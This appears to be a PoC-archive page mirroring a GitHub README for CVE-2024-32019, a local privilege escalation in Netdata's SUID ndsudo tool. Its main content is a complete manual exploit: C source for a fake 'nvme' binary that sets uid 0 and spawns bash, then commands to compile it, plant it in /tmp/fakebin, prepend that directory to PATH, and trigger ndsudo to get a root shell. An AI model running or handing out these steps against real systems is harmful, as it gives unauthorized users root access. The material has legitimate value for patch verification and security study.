Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Readme
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019:
  Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →